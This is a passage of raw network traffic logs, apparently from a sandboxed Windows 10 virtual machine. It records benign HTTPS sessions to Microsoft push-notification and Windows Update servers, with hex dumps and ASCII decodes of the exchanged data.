2024-10-02 16:44:32 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 6a 4a 5a 5a 52 39 4e 56 30 57 31 73 2f 31 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 31 33 37 62 61 35 63 31 66 62 35 32 63 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ijJZZR9NV0W1s/1Y.3Context: cd137ba5c1fb52c1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:44:32 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:44:32 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 36 76 73 45 53 53 54 33 4f 6b 36 53 45 76 6a 4e 56 64 74 51 43 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 6vsESST3Ok6SEvjNVdtQCQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49726	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:35 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BAoeUus2xkm61dk&MD=oeKvmgLu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 16:44:35 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 305034ab-9485-475e-8faa-f632147e88aa MS-RequestId: e371aacb-2cb9-43ee-a4f4-66c750423567 MS-CV: pk48XGaW502nS24Z.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 16:44:35 GMT Connection: close Content-Length: 24490
2024-10-02 16:44:35 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-02 16:44:35 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49731	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:44 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 45 66 46 73 65 4f 50 68 30 47 34 73 42 44 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 39 62 65 33 62 37 39 32 35 65 35 61 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 7EfFseOPh0G4sBDo.1Context: 7679be3b7925e5aa
2024-10-02 16:44:44 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-02 16:44:44 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 45 66 46 73 65 4f 50 68 30 47 34 73 42 44 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 39 62 65 33 62 37 39 32 35 65 35 61 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 7EfFseOPh0G4sBDo.2Context: 7679be3b7925e5aa<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
2024-10-02 16:44:44 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 45 66 46 73 65 4f 50 68 30 47 34 73 42 44 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 39 62 65 33 62 37 39 32 35 65 35 61 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 7EfFseOPh0G4sBDo.3Context: 7679be3b7925e5aa<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:44:44 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:44:44 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 39 41 55 62 4d 4a 64 55 77 30 71 30 56 45 52 69 4d 4e 65 4c 33 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 9AUbMJdUw0q0VERiMNeL3w.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49732	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:45:04 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 36 68 79 50 6f 4b 57 39 45 53 44 76 35 73 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 31 65 62 34 35 37 64 36 66 39 65 61 30 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: v6hyPoKW9ESDv5sb.1Context: e11eb457d6f9ea07
2024-10-02 16:45:04 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-02 16:45:04 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 76 36 68 79 50 6f 4b 57 39 45 53 44 76 35 73 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 31 65 62 34 35 37 64 36 66 39 65 61 30 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: v6hyPoKW9ESDv5sb.2Context: e11eb457d6f9ea07<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
2024-10-02 16:45:04 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 76 36 68 79 50 6f 4b 57 39 45 53 44 76 35 73 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 31 65 62 34 35 37 64 36 66 39 65 61 30 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: v6hyPoKW9ESDv5sb.3Context: e11eb457d6f9ea07<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:45:04 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:45:04 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 72 78 4c 30 7a 43 58 64 78 6b 47 44 74 33 4d 63 4a 61 36 35 58 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: rxL0zCXdxkGDt3McJa65XA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49733	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:45:13 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BAoeUus2xkm61dk&MD=oeKvmgLu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 16:45:13 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 33dc60de-16a2-4d66-bd3b-10238c636643 MS-RequestId: ba3e00c8-9644-45f4-9dc7-0a7bcf9b5c82 MS-CV: qRhMc0nBtUqPK0cy.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 16:45:12 GMT Connection: close Content-Length: 30005
2024-10-02 16:45:13 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-02 16:45:13 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49736	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:45:30 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 68 46 77 4d 41 6a 32 68 6b 53 59 6d 66 44 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 61 66 32 64 35 61 63 66 35 37 38 65 62 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: GhFwMAj2hkSYmfDQ.1Context: bbaf2d5acf578eb8
2024-10-02 16:45:30 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-02 16:45:30 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 47 68 46 77 4d 41 6a 32 68 6b 53 59 6d 66 44 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 61 66 32 64 35 61 63 66 35 37 38 65 62 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: GhFwMAj2hkSYmfDQ.2Context: bbaf2d5acf578eb8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
2024-10-02 16:45:30 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 68 46 77 4d 41 6a 32 68 6b 53 59 6d 66 44 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 61 66 32 64 35 61 63 66 35 37 38 65 62 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: GhFwMAj2hkSYmfDQ.3Context: bbaf2d5acf578eb8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:45:30 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:45:30 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 6c 6f 76 74 66 73 64 4a 2b 55 53 43 6d 48 72 53 6a 4a 69 49 47 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: lovtfsdJ+USCmHrSjJiIGA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49739	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:45:59 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 77 77 31 4c 51 54 65 2f 45 4f 39 55 70 43 38 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 64 63 37 36 62 30 63 30 30 33 66 34 31 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: bww1LQTe/EO9UpC8.1Context: 97dc76b0c003f416
2024-10-02 16:45:59 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
